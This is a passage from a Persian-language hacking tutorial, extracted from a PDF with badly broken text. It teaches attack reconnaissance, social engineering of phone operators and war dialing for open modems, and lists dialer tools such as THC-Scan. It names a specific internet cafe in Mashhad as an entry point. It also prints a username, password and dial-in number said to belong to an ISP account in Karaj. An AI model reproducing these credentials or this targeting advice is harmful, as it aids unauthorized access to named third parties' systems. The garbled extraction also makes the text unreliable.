ﮐﺎﻣﻼ ﺕﻮﺽﻴﺢ دادﻩ ام ﮐﻪ رﺏﻂ ایﻦ ﻣﺘﺪ را ﺏﻪ ﺁن ﻗ ﺴﻤﺖ ﻧﻤ ﯽ داﻧ ﻢ ﺧ ﻮدم ه ﻢ ‪ ،‬وﻟ ﯽ ﺟ ﺎی دیﮕ ﺮی ﺏ ﺮای ﺕﻮﺽ ﻴﺢ ﺁن ﭘﻴ ﺪا‬ ‫ﻧﮑﺮدم ( و در ﮔﺎم دوم ﺱﻌﯽ ﺏﺮ ﺕﻮﺽﻴﺢ و ﺁﻣﻮزش ﭘﻮیﺶ ﭘﻮرت هﺎ و ﺏﻌﺪ ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت از ﺱﺮ ﺏﺮﮔﻬﺎ یﺎ " هﺪر هﺎ " ﺏﭙ ﺮدازم‪ .‬در ﮔ ﺎم ﺱ ﻮم‬ ‫ﺱﻌﯽ ﺏﺮ ﺁن ﮐﺮدﻩ ام ﻧﺮم اﻓﺰارهﺎی ﭘﻮش ﻧﻘﺎط ﺁﺱﻴﺐ ﭘﺬیﺮی ﺱﻴﺴﺘﻢ و ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی را ﺕﻮﺽﻴﺢ دهﻢ‪ .‬در ﮔﺎم ﭼﻬﺎرم و ﺁﺧﺮ ﺕﻤ ﺎم ﺕ ﻼش ﺧ ﻮد‬ ‫را ﮐﺮدﻩ ام ﮐﻪ ﮐﻤﮏ ﺏﻪ ﺕﺠﺰیﻪ ﺕﺤﻠﻴﻞ اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺁﻣﺪﻩ را اﻧﺠﺎم دهﻢ ﺕﺎ ﺷﻤﺎ در اﻧﺘﺨﺎب ﺷﻴﻮﻩ ﻣﻮرد ﻧﻈﺮ ﺏﺮای ﺡﻤﻠﻪ ﺏﻬﺘﺮیﻦ را اﻧﺘﺨﺎب ﮐﻨﻴﺪ ‪.‬‬ ‫ﺁﺧﺮیﻦ ﺡﺮف ﻣﻦ ﺕﻮﺟﻪ ﺏﻪ ایﻦ ﻧﮑﺘﻪ اﺱﺖ ﺱﻌﯽ ﮐﺮدم ﮐﻪ اﺏﺰارهﺎی اﺏﺘﺪایﯽ و ﭘﺎیﻪ ویﻨﺪوز را در اﻧﺘﻬ ﺎ ﻣﻌﺮﻓ ﯽ ﮐ ﻨﻢ و اﻟﺒﺘ ﻪ ﻣﻔ ﺎهﻴﻢ ﭘﺎی ﻪ ای ﯽ هﻤﭽ ﻮن‬ ‫ﭘﻮرت ‪ ،‬ﭘﺮوﺕﮑﻞ ‪ TCP‬و ‪ . UDP‬اﻣﻴﺪ اﺱﺖ ﺏﺮای ﺷﻤﺎ راﻩ ﮔﺸﺎ و ﻣﻔﻴﺪ واﻗﻊ ﺷﻮد‪ .‬اﻟﺒﺘﻪ در یﮑﯽ از ﺽﻤﻴﻤﻪ ه ﺎ ﺏ ﻪ ﻣﻌﺮﻓ ﯽ راﻩ ﺡ ﻞ اﺟ ﺮای ﺏﺮﻧﺎﻣ ﻪ‬ ‫هﺎی ﺧﺎﻧﻮادﻩ یﻮﻧﻴﮑﺲ در ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ویﻨﺪوز ﭘﺮداﺧﺘﻪ ام ﮐﻪ ﻓﻮق اﻟﻌﺎدﻩ ﻣﻔﻴﺪ ﻣﻴﺒﺎﺷﺪ )اﻟﺒﺘﻪ ﻣﻦ ایﻦ ﮔﻮﻧﻪ ﻓﮑﺮ ﻣﻴﮑﻨﻢ(‪.‬‬ ‫ﻗﺼﺪ دارم در اوایﻞ ﺕﺎﺏﺴﺘﺎن ایﻦ ﻣﻘﺎﻟﻪ را دوﺏﺎرﻩ ویﺮایﺶ ﮐﺮدﻩ و اﺏﺰار هﺎیﯽ ﺟﺪیﺪی را ﮐﻪ در ایﻦ ﻣﻘﺎﻟﻪ از ﻗﻠﻢ اﻓﺘﺎدﻩ ﺕﻮﺽﻴﺢ دهﻢ‪.‬‬ ‫ﺏﻪ اﻣﻴﺪ ﻣﻮﻓﻘﻴﺖ ﺕﻤﺎم دوﺱﺘﺎن‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٥‬‬

‫ﻣﻘﺪﻣﻪ ﮔﺎم اول هﮏ ‪:‬‬ ‫هﻤﻴﺸﻪ ﻗﺒﻞ از ﺡﻤﻠﻪ ایﻦ ﮐﺎر اﻧﺠﺎم ﻣﻴﺸﻮد!!" ﺁﺏﺮاهﺎم ﻟﻴﻨﮑﻦ " ﻣﻴﮕﻮی ﺪ ‪ :‬ﭼﻨ ﺎن ﭼ ﻪ ﻗ ﺮار ﺏﺎﺷ ﺪ درﺧﺘ ﯽ را در ﻣ ﺪت ‪ ۶‬ﺱ ﺎﻋﺖ ﻗﻄ ﻊ ﮐ ﻨﻢ ‪ ۴ ،‬ﺱ ﺎﻋﺖ‬ ‫ﻧﺨﺴﺖ ﺁن را ﺻﺮف ﺕﻴﺰ ﮐﺮدن ﺕﺒﺮ ﺧﻮاهﻢ ﮐﺮد‪ !!!.‬ﻣﺜﻞ ﺕﻤﺎم ﮐﺎرهﺎ اول یﮏ ﮐﻢ درﺏﺎرﻩ هﺪف اﻃﻼﻋﺎت ﺟﻤﻊ ﺁوری ﻣﻴﮑﻨﻴﻢ و ﺏﻌ ﺪ ﺷ ﺮوع ﺏ ﻪ ﺡﻤﻠ ﻪ‬ ‫ﻣﯽ ﮐﻨﻴﻢ یﮏ هﮑﺮ ﺧﻮب هﻴﭻ وﻗﺖ ﺏﺪون ﻣﻘﺪﻣﻪ و ﮐﻮر‪ ،‬را ﮐﻮر ﺏﻪ هﺪف ﺡﻤﻠﻪ ﻧﻤﻴﮑﻨﺪ ﭼﻮن اﺡﺘﻤﺎل ﻣﻮﻓﻘﻴ ﺖ ﺏ ﺴﻴﺎر ﭘ ﺎیﻴﻦ و ﺧﻄ ﺮ ه ﺎ ﺏ ﺴﻴﺎر اﺱ ﺖ‪.‬‬ ‫هﻤﻴﺸﻪ ﺏﺪاﻧﻴﺪ ﮐﻪ ایﻦ ﻣﺮﺡﻠﻪ ﺏﺴﻴﺎر ﻃﻮﻻﻧﯽ ﺏﻮدﻩ و ﺏﺴﻴﺎر ﭘﺮ اهﻤﻴﺖ و اﻟﺒﺘﻪ ﭘﺮهﺰیﻨﻪ ‪.‬‬ ‫اﮔﺮ ﺧﻮاﺱﺘﻴﺪ ﺏﺪاﻧﻴﺪ ﺷﻨﺎﺱﺎیﯽ ﻣﻘﺪﻣﺎﺕﯽ هﺪف ﺏﻪ ﭼﻪ ﻣﻌﻨﯽ اﺱﺖ و یﻌﻨﯽ ﭼﻪ ایﻦ را ﺕﺼﻮر ﮐﻨﻴﺪ ﮐﻪ در ی ﮏ ﻣﻴ ﺪان ﻧﺒ ﺮد واﻗﻌ ﯽ ه ﺴﺘﻴﺪ و ﺡ ﺎل ﭼﮕﻮﻧ ﻪ‬ ‫ﻣﻴﺘ ﻮان ﺏ ﺪون ﺁﮔ ﺎهﯽ از ﻣﻮﻗﻌﻴ ﺖ ﺟﻐﺮاﻓﻴ ﺎیﯽ و ﻣﺤ ﻞ اﺱ ﺘﻘﺮار ﻧﻴﺮوه ﺎی دﺷ ﻤﻦ و ﺁﮔ ﺎهﯽ از ﺡﺠ ﻢ ﻧﻴﺮوه ﺎ ‪ ،‬ادوات ‪ ،‬ﻣﻬﻤ ﺎت و‪ ...‬دﺱ ﺖ ﺏ ﻪ ﺡﻤﻠ ﻪ‬ ‫ﻣﻮﻓﻘﻴﺖ ﺁﻣﻴﺰ زد و زﻧﺪﻩ ﻣﺎﻧﺪ !‬ ‫ﺷﻤﺎ هﻢ ﻣﺜﻞ ﻣﻦ ﺕﺎ ﺏﻪ ﺡﺎل دﻩ ه ﺎ و ﺷ ﺎیﺪ ﺻ ﺪهﺎ ﻓ ﻴﻠﻢ درﺏ ﺎرﻩ ﺱ ﺮﻗﺖ از ﺏﺎﻧ ﮏ دی ﺪﻩ ای ﺪ‪ .‬ی ﮏ ﺱ ﺎرق ﺏ ﺪون داﺷ ﺘﻦ اﻃﻼﻋ ﺎﺕﯽ درﺏ ﺎرﻩ ﺁن ﺏﺎﻧ ﮏ ﻣﺜ ﻞ‬ ‫راهﻬﺎی ﻓﺮار دورﺏﻴﻦ هﺎ ﺱﻴﺴﺘﻢ دزد ﮔﺮ و ﻣﻮﻗﻌﻴﺖ زﻧﮓ هﺎ ﺕﻌﺪاد ﮐﺎرﻣﻨﺪان و‪ ...‬ﭼﮕﻮﻧﻪ ﻣﻴﺘﻮاﻧﺪ ﻣﻮﻓﻖ ﺏﺎﺷﺪ‪ .‬ﺡﺎل ﺏﻌ ﺪ از درک ﻣﻔﻬ ﻮم ﻣ ﻮرد ﻧﻈ ﺮ‬ ‫ﻣﻴﺮﺱﻴﻢ ﺏﻪ اﺻﻞ ﻣﻄﻠﺐ‪.‬‬ ‫ﮔﺎم اول‬ ‫راهﻬﺎی ﺵﻨﺎﺱﺎﻳﯽ ﻣﻘﺪﻣﺎﺕﯽ ﺵﺒﮑﻪ هﺪف ‪:‬‬ ‫‪ -١‬روش ﻣﺦ ﺕﺮ ﮐﺎﻧﯽ !!!‬ ‫‪ -٢‬دﺱﺘﺮﺱﯽ ﺏﻪ ﺷﺒﮑﻪ ‪.‬‬ ‫‪ -٣‬ﺟﺴﺘﺠﻮ در وب ﺏﻪ دﻧﺒﺎل اﻃﻼﻋﺎت ﺷﺒﮑﻪ هﺪف ‪.‬‬ ‫‪ -۴‬ﮔﺮﻓﺘﻦ اﻃﻼﻋﺎت از ﺱﻴﺴﺘﻢ ‪. DNS‬‬ ‫‪ -۵‬ﻧﺮم اﻓﺰارهﺎی ﻣﺮﺏﻮﻃﻪ ‪.‬‬ ‫‪ -۶‬و‪...‬‬ ‫‪ -١‬روش ﻣﺦ ﺕﺮ ﮐﺎﻧﯽ ‪:‬‬ ‫ﺷﺎیﺪ ﻓﮑﺮ ﮐﻨﻴﺪ ﻣﺴﺨﺮﻩ اﺱﺖ و ﺷﺎیﺪ ﻣﻘﺎﻟﻪ یﺎ روﺷﻬﺎی زیﺎدی را ﺧﻮاﻧﺪﻩ ﺏﺎﺷ ﻴﺪ ‪ ،‬درﺏ ﺎرﻩ ای ﻦ روش‪.‬ﻣ ﻦ زی ﺎد در ای ﻦ ﻣﺒﺤ ﺚ وارد ﻧﻤﻴ ﺸﻮم اﻣ ﺎ ﺏﮕ ﻢ‬ ‫ﻗﺪیﻢ هﺎ ﺧﻴﻠﯽ ﮐﺎرای داﺷﺖ ﺏﺮای ﻣﻦ اﻻن ﺱﻄﺢ ﺁﮔﺎهﯽ اﭘﺮا ﺕﻮرهﺎ ﺏﺎﻻ رﻓﺘﻪ اﻣﺎ هﻨﻮز هﻢ روش ﮐﺎری اﺱﺖ ﺏﺎور ﮐﻨﻴﺪ! ‪ ،‬ﻣﻦ ﺏﻪ ﺷﻤﺎ ﺕﻮﺻ ﻴﻪ ﻣﻴﮑ ﻨﻢ‬ ‫ﮐﺘﺎب " ‪ " Kevin Mitnick Art Of Deception‬را ﺡﺘﻤﺎ در ایﻦ ﺏﺎرﻩ ﺏﺨﻮاﻧﻴﺪ‪.‬ﺷﺎیﺪ وﻗﺖ زیﺎدی ﺏﮕﻴﺮد‪ ،‬راﺱﺘﯽ ﭘﻮل هﻢ ﺏﺮاش ﻧﻤﻴﺨﻮاهﺪ ﺏﺪهﻴ ﺪ‬ ‫ﭼﻮن ‪ E-BOOK‬ﺁن داﺧﻞ ﺷﺒﮑﻪ زیﺎد اﺱﺖ ‪ .‬داﺧﻞ ﮔﻮ ﮔﻞ یﮏ ﺟﺴﺘﺠﻮ ﮐﻨﻴﺪ ﺡﺘﻤﺎ ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ یﮏ ﻧﺴﺨﻪ از ﺁن را‪.‬‬ ‫‪ -٢‬دﺱﺘﺮﺱﯽ ﺑﻪ ﺵﺒﮑﻪ ‪:‬‬ ‫ﻧﮑﺘﻪ ﻣﻦ ﺏﺮای درک و ﻓﻬﻢ ﺏﻬﺘﺮ ﻣﻔﻬﻮم ﻗﺮﺏﺎﻧﯽ را یﮏ ‪ ISP‬ﻓﺮض ﮐﺮدم در ایﻦ ﻗﺴﻤﺖ‪.‬‬ ‫ایﻦ هﻢ ﻣﺜﻞ ﺏﺎﻻیﯽ ﺷﺎیﺪ ﻓﮑﺮ ﮐﻨﻴﺪ ﻣﺴﺨﺮﻩ اﺱﺖ اﻣﺎ یﮏ ﭼﻨﺪ ﻣﺜﺎل یﮏ ﭼﻨﺪ روﺷ ﯽ ﺕﻮﺽ ﻴﺢ ﻣﻴ ﺪهﻢ ﺕ ﺎ ﺏﻔﻬﻤﻴ ﺪ ﭼﻘ ﺪر ﮐ ﺎرایﯽ دارد و ﺏ ﺪرد ﺏﺨ ﻮر اﻣ ﺎ‬ ‫ﺧﻴﻠﯽ ﭘﺮ ﺧﺮج اﺱﺖ ﺏﻌﻀﯽ روﺷﻬﺎی ﺁن دیﮕﺮ ﺏﺮای ﻣﻦ و ﺏﻌﻀﯽ هﺎ ﺻﺮف ﻧﻤﻴﮑﻨﺪ اﻣﺎ در ﺏﻌﻀﯽ ﻣﻮاﻗﻊ ﺏﺴﻴﺎر ﺏ ﺪرد ﺏﺨ ﻮر‪ .‬ﺏ ﺎ ی ﮏ ﻣﺜ ﺎل ﺷ ﺮوع‬ ‫ﻣﻴﮑﻨﻴﻢ ‪ .‬ﺧﻴﻠﯽ ﻣﻮاﻗﻊ ﺏﻴﺸﺘﺮ ‪ ISP‬هﺎ ‪ ،‬یﮏ ﮐﺎﻓﯽ ﻧﺖ هﻢ ﺏﺮای ﺧﻮدﺷﺎن دارﻧﺪ ﮐﻪ ﮐﻨﺎر ﺱﺮور هﺎی ﺁن هﺎ هﻢ اﺱﺖ و در ﺏﻌﻀﯽ ﻣﻮاﻗﻊ ﺱﺮور هﺎ ه ﻢ‬ ‫ﻣﺸﺘﺮک اﺱﺖ ﺏﻪ ﺏﻪ !! ) ﻗﺎﺏﻞ ﺕﻮﺟﻪ ﻣﺸﻬﺪی هﺎ ﻣﺜﻞ ﮐﺎﻓﯽ ﻧﺖ ﺧﻴﺎم در ﺏﻮﻟﻮار اﻣﺎم رﺽﺎ)ع( در ﻣﺸﻬﺪ ( ﮐﻪ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ ﭘ ﺸﺖ ی ﮏ ﺱﻴ ﺴﺘﻢ ﻧﺸ ﺴﺘﻪ‬ ‫و ﮐﻠﯽ اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺏﻴﺎوریﺪ ﻣﺜﻞ ﻧﻮع اﺕﺼﺎل‪ ،‬ﭘﻬﻨﺎی ﺏﺎﻧﺪ ‪ ،‬ﻧﻮع ﻣﺴﻴﺮ یﺎب و ‪. ...‬اﻣﺎ یﮏ راﻩ ﺱ ﺎدﻩ ﺕ ﺮ ه ﻢ اﺱ ﺖ ﺏﻌ ﻀﯽ از ﺻ ﺎﺡﺒﺎن ‪ ISP‬ه ﺎ‬ ‫ﺏ ﺮای ﺧﻮدﺷ ﺎن و ‪ ...‬ی ﮏ اﮐﺎﻧ ﺖ روی ﺱ ﺮور درﺱ ﺖ ﻣﻴﮑﻨﻨ ﺪ ﮐ ﻪ ﻗﺎﺏ ﻞ ﺡ ﺪس زدن ﻣﻴﺒﺎﺷ ﺪ‪ ".‬ﻗﺎﺏ ﻞ ﺕﻮﺟ ﻪ ﮐﺮﺟ ﯽ ه ﺎ " ﻣﺜ ﻞ اﮐ ﺎﻧﺘﯽ ﺏ ﺎ ﻧ ﺎم ﮐ ﺎرﺏﺮ‬ ‫ﭘﺮویﺰیﺎن )‪ ( parvizian‬و ﮐﻠﻤﻪ ﻋﺒﻮر ‪ ٢۵٠۵۵٣۴‬و ﺷﻤﺎرﻩ دﺱﺖ رﺱ ﯽ ﺏ ﻪ ﺷ ﺒﮑﻪ ‪ ٩٧١٢٠٠‬ﮐ ﻪ ﺏﺮاﺡﺘ ﯽ ﺡ ﺪس زدﻩ و ﻟ ﻮ ﻣﻴ ﺮود‪ .‬در ﺏﻌ ﻀﯽ‬ ‫ﻣﻮاﻗﻊ ﺡﻀﺮت ﻣﺪیﺮ ﺏﻪ ﻋﻠﺖ ﺷﻠﻮﻏﯽ ﺧﻂ هﺎی ﺷﺒﮑﻪ ﺷﺎن ﺕﺮﺟﻴﺢ ﻣﻴﺪهﺪ یﮏ ﻣﻮدم را در ﺏﺴﺖ در اﺧﺘﻴﺎر داﺷﺘﻪ ﺏﺎﺷﺪ ﮐﻪ ایﻦ ه ﻢ رای ﺞ اﺱ ﺖ اﻟﺒﺘ ﻪ‬ ‫ﺏﺮای راﺡﺘﯽ ﮐﺎر در ﺏﻌﻀﯽ ﻣﻮاﻗﻊ ﮐﻪ ﻧﺎدر هﻢ ﻧﻴﺴﺖ ﺏﺪون ﮐﻠﻤﻪ ﻋﺒﻮر! ﮐﻪ ﻣﺎ ﺏﺮای دﺱﺘﺮﺱﯽ ﺏﻪ ایﻦ ﻣﻮدم هﺎ و اﻟﺒﺘﻪ ﺷﻨﺎﺱﺎیﯽ ﺁﻧﻬﺎ از ﺏﺮﻧﺎﻣ ﻪ ه ﺎی‬ ‫" ‪ " WAR DIALER‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ‪.‬و ﺏﺮای ﺡﻤﻠﻪ ﺏﻪ ﺁﻧﻬﺎ از "‪ " DEMON DIALER‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺕﺎ ﺏﻔﻬﻤ ﻴﻢ ﻧ ﺎم ﮐ ﺎرﺏﺮ و ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﺁن‬ ‫را ‪.‬‬ ‫اول = ﺏﺎیﺪ ﺕﻤﺎم ﺷﻤﺎرﻩ هﺎی ﺕﻠﻔﻦ ﺷﺮﮐﺖ ) ‪ ( ISP‬را ﺏﺪﺱﺖ ﺁورد ﮐﻪ ﺏﻬﺘﺮیﻦ راﻩ ‪ ١١٨‬اﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﺏﺎی ﺪ هﻨ ﺮ " ﻣ ﺦ ت ﻟﻴ ﺖ ﮐﻨ ﯽ " داﺷ ﺘﻪ ﺏﺎﺷ ﻴﺪ‬ ‫ﮐﻪ هﻤﻪ ﭘﺴﺮهﺎ ﻣﻌﻤﻮﻻ ﺏﻪ ﻏﻴﺮ از اﻣﺜﺎل ﺧﻮدم ایﻦ یﮑﯽ را دارا هﺴﺘﻦ!! و راﻩ دوم اﺱﺘﻔﺎدﻩ از ﻧﺮم اﻓﺰار اﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ در ایﻦ ﺏﺎرﻩ هﻢ‪.‬‬ ‫ﺏﻌﺪ از ﺕﺮﮐﺎﻧﺪن ﻣﺦ اﭘﺮا ﺕﻮر ‪ ١١٨‬و ﺏﺪﺱﺖ ﺁوردن ﺕﻤﺎم ﺷﻤﺎرﻩ هﺎ ﺁﻧﻬﺎ را ﺕﻔﮑﻴﮏ ﻣﻴﮑﻨﻴﻢ ﺏﺮای راﺡﺘﯽ ﮐﺎر ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ ﺷﻤﺎرﻩ ه ﺎی اﺕ ﺼﺎل‬ ‫ﺏﻪ ﺷﺒﮑﻪ را ﮐﻪ ﻣﻌﻤﻮﻷ ﭘﺸﺖ ﮐﺎرت ایﻨﺘﺮﻧﺖ ﺁن ﺷﺮﮐﺖ ﻣﯽ ﺏﻴﻨﻴﺪ ﮐﻨﺎر ﮔﺬاﺷﺘﻪ ﺷ ﻤﺎرﻩ ه ﺎی رواﺏ ﻂ ﻋﻤ ﻮﻣﯽ و ﭘ ﺸﺘﻴﺒﺎﻧﯽ ه ﺎ را ه ﻢ هﻤﻴﻨﻄ ﻮر ﺏﻌ ﺪ ﻣ ﺎ‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦‬‬

‫ﺏﺎﻗﯽ ﺷﻤﺎرﻩ هﺎ را ﺏﻌﺪ ﺏﺎ ﺕﻠﻔﻦ یﮏ ﺕﻤﺎس ﮐﻮﭼﻮﻟﻮ ﺏﺎ ﺁﻧﻬﺎ ﺏﺮ ﻗﺮار ﮐﺮدﻩ ﺕﺎ ﺏﻔﻬﻤﻴﻢ ﭼﮑﺎرﻩ هﺴﺘﻦ ایﻦ ﺷﻤﺎرﻩ هﺎ ﺁﻧﻬﺎی را ﮐ ﻪ ﺁدم ﮔﻮﺷ ﯽ را ﺏ ﺮ داﺷ ﺖ‬ ‫و اﻟﻮ اﻟﻮ ﮐﺮد ﮐﻨﺎر ﻣﻴﮕﺰاریﻢ و ﺏﻌﺪ ﺁﻧﻬﺎی را ﮐﻪ ﺁدم ﺏﺮ ﻧﺪاﺷﺘﻪ وﻟﯽ ﺕﻤﺎس ﺏﺮﻗﺮار ﺷﺪﻩ هﻢ یﮏ ﻃﺮف ﻣﺎ ﺏﺎ ایﻨﻬﺎ ﮐﺎر داریﻢ ‪.‬ایﻨﻬﺎ را ﻧﮕﻪ داریﺪ ﻣﺎ ﺏﺎ‬ ‫ایﻨﻬﺎ ﮐﺎر داریﻢ ﻓﻌﻼ زیﺎدی رﻓﺘﻴﻢ ﺟﻠﻮ یﮏ ﻗﺪم ﻣﻴﮕﺮدیﻢ ﻋﻘﺐ ﺕﺎ ﺏﺒﻴﻨﻴﻢ ﭼﻪ ﻣﻴﺸﻪ ﮐﺮد اﮔﺮ ﻣﺦ اﭘﺮا ﺕﻮر ﺕﺮﮐﺎﻧﺪﻧﯽ ﻧﺒﻮد ﮐﻪ ﻧﺒﻮد ‪.‬‬ ‫ﺏﺮای ﺕﻤﺎم ﮐﺴﺎﻧﯽ ﮐﻪ ﻣﻘﺪاری ﺏﻪ اﺻﻮل ﮐﺎر ﻣﻮدم و ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﺁﺷ ﻨﺎی دارﻧ ﺪ ﺡﺘﻤ ﺎ ﻣﻴﺪاﻧﻨ ﺪ ﮐ ﻪ وﻗﺘ ﯽ ﺏ ﺎ ی ﮏ ﻣ ﻮدم ﺕﻤ ﺎس ﻣﻴﮕﻴﺮﻧ ﺪ ﺏ ﺮای اﺕ ﺼﺎل ﺏ ﻪ‬ ‫ﮐﺎﻣﭙﻴﻮﺕﺮ و یﺎ ‪ ...‬ﺡﺘﻤﺎ ﻧﻴﺎز ﺏﻪ یﮏ ﺱﺮویﺲ دهﻨﺪﻩ اﺱﺖ ﺕﺎ ﺁن ﺱﺮویﺲ دهﻨﺪﻩ ﺽﻤﻦ دﺱﺘﻮر وﺻﻞ ارﺕﺒﺎط هﻮیﺖ ﮐﺎرﺏﺮ دور را ﺕﺸﺨﻴﺺ دهﺪ و ﺏﻌﺪ‬ ‫از اﺡﺮاز هﻮیﺖ ﺏﻪ او ﺱﺮویﺲ دهﺪ ‪.‬‬ ‫ﺏﺮای درک ﺏﻬﺘﺮ ﻣﻮﺽﻮع یﮏ ﻣﺜﺎل ﻣﻴﺰﻧﻢ ﺷﻤﺎ یﮏ ﮐﺎﻣﭙﻴﻮﺕﺮ داریﺪ و ﺁن ﺕﻮﺱﻂ یﮏ ﻣﻮدم هﻤﻴﺸﻪ ﺏﻪ ﺧﻂ ﺕﻠﻔﻦ ﻣﺘﺼﻞ اﺱ ﺖ ﺷﺨ ﺼﯽ ﺏ ﺎ ﺷ ﻤﺎ ﺕﻤ ﺎس‬ ‫ﻣﻴﮕﻴﺮد ﺷﻤﺎ ﭘﺸﺖ ﮐﺎﻣﭙﻴﻮﺕﺮ ﭼﻮن ﻧﺮم اﻓﺰاری را ﺏﺮای ایﻦ ﻣﻨﻈﻮر ﺏﺎﻻ ) ﻓﻌﺎل و در ﺡﺎل اﺟﺮا ( ﻧﻴﺎوردﻩ ایﺪ ﻣﺘﻮﺟﻪ ﺕﻤﺎس او ﻧﻤﯽ ﺷﻮیﺪ وﻟﯽ ﮔﻮﺷﯽ‬ ‫ﺕﻠﻔﻦ زﻧﮓ ﻣﻴﺰﻧﺪ و ﺷﻤﺎ از ﻃﺮیﻖ ﮔﻮﺷﯽ ﺕﻠﻔﻦ ﻣﺘﻮﺟﻪ ﺕﻤﺎس ﻣﻴﺸﻮیﺪ‪.‬‬ ‫ﭼﻨﺪ ﻧﻤﻮﻧﻪ از ﻧﺮم اﻓﺰارهﺎی ﺱﺮویﺲ دهﻨﺪﻩ ﻣﻮدم ﺏﺮای اﺡﺮاز هﻮیﺖ از راﻩ دور اﻟﺒﺘﻪ ﻣﺸﻬﻮرﺕﺮیﻦ هﺎ ﻋﺒﺎرﺕﻨﺪ از‪:‬‬ ‫‪1- SYMANTEC S PC ANYWHERE‬‬ ‫‪2-LAPLINK‬‬ ‫‪3-CONROLIT‬‬ ‫‪4- ….‬‬ ‫ﻗﺎﺏﻞ ذﮐﺮ اﺱﺖ هﺮ ﮐﺪام از ایﻦ هﺎ در ﺻﻮرت ﭘﻴﮑﺮ ﺏﻨﺪی ﻧﺎدرﺱﺖ ﺏﺮای ﻣﺎ هﺎ ﻣﺎ ﻓﻮق هﻠﻮ هﺴﺘﻨﺪ‪.‬‬ ‫ﻣﺜﻞ ﺷﻤﺎرﻩ یﮏ ﮐﻪ اﮔﺮ اﭘﺮا ﺕﻮر ﺁن ﻧﺎﺷﯽ ﺏﺎﺷﺪ و ﺏﻌﺪ از ﻧ ﺼﺐ ﺁن را درﺱ ﺖ ﭘﻴﮑ ﺮ ﺏﻨ ﺪی ﻧﮑﻨ ﺪ ﺷ ﻤﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﺪون ﮐﻠﻤ ﻪ ﻋﺒ ﻮر و‪ ...‬ﺏ ﻪ ﺁن ﻣﺎﺷ ﻴﻦ‬ ‫وﺻﻞ ﺷﺪﻩ و از اﻣﮑﺎﻧﺎﺕﯽ ﻣﺜﻞ یﮏ ﮐﺎرﺏﺮ ﻣﻌﻤﻮﻟﯽ ﮐﻪ ﭘﺸﺖ ﺁن ﺱﻴﺴﺘﻢ اﺱﺖ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ‪.‬‬ ‫ﺕﺎ ﺏﻪ ﺡﺎل ﻋﻤﺮ هﮑﺮی ﻣﺎ اﺏﺰار هﺎی زیﺎدی ﺏﺮای ﮐﺸﻒ ﻣﻮدم اﺧﺘﺮاع ﺷﺪﻩ اﺱ ﺖ و ﺕ ﺎ ﺁﻧﺠ ﺎ ﮐ ﻪ ﻣ ﺎ ) ﻣ ﻦ و ه ﺰاران ﺷ ﻴﻄﺎن هﻤ ﺮاﻩ ﺧ ﻮدم( ﻣﻴ ﺪاﻧﻴﻢ‬ ‫ﺱﺎﺏﻘﻪ ﺁﻧﻬﺎ ﺏﻪ ﻧﻴﻤﻪ دوم دهﻪ ﻧﻮد ﻣﻴﻼدی ﻣﻴﺮﺱﺪ ‪ .‬ﮐﻪ ﺏﺮای ﺁﺷﻨﺎیﯽ ﺷﻤﺎ ﺕﻌﺪادی از ایﻦ ﻧﺮم اﻓﺰار‪ ،‬را ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ‪.‬‬ ‫‪1- DELUXE FONE-CODE HACKER 1985‬‬ ‫‪2- DIALING DEMON VERSION 1.05 , BY TRACY MCKIBBEN 1988‬‬ ‫‪3- PBX SCANNER VERSION 5.0, BAY GREAT WHITE 1989‬‬ ‫‪4- SUPER DIALER 1.3, BAY EVAN ANDERSON 1990‬‬ ‫‪5- DOO TOOLS VERSION 1.10, PHANTOM PHOTON 1991‬‬ ‫‪6- Z-HACKER 3.21, BY BLACKBEARD 1991‬‬ ‫‪7- TONLOC 1.10, BAY MINOR THREAT & MUCHO MAAS 1994‬‬ ‫‪8- A-DIAL (AUTO DAIL), BAY VEXATION 1995‬‬ ‫‪9-X-DIALER, BAY ICIKL 1996‬‬ ‫ﻣﻦ ﺡﺎﻻ ﺏﻪ ﻣﻌﺮﻓﯽ و ﺁﻣﻮزش یﮑﯽ از ایﻦ اﺏﺰارهﺎ ﻣﻴﭙﺮدازم ﺏﻪ ﻧﺎم ‪: THC-Scan 2.0‬‬ ‫ﺷﺎیﺪ ﺕﺎ ﺏﻪ ﺡﺎل ﻧﺮم اﻓﺰاری ﺏﻪ ایﻦ ﻗﺪرت در ﮐﺎرش ﻧﺪیﺪم ) اﻟﺒﺘﻪ در ایﻦ ﻣﻘﻮﻟﻪ ( ‪ .‬در ﺱﺎل ‪ ١٩٩٨‬ﺁﻣﺪﻩ و ﻣﺎل ‪ ٧‬ﺱﺎل ﭘﻴﺶ اﺱ ﺖ اﻣ ﺎ هﻨ ﻮز ﮐ ﺎرایﯽ‬ ‫اﺱﺎﺱﯽ دارد در ﺕﻤﺎم ﻧﺴﺦ ویﻨﺪوز ) از ﻣﺪل ‪ ٣٫١‬ﺕﺎ ‪ ( WINDOWS SERVER 2003‬ﻗﺎﺏﻞ اﺟﺮا اﺱﺖ‪ .‬دارای ﺧﺮوﺟ ﯽ ﮔﺮاﻓﻴﮑ ﯽ ﻧﻴ ﺴﺖ ﻣﺜ 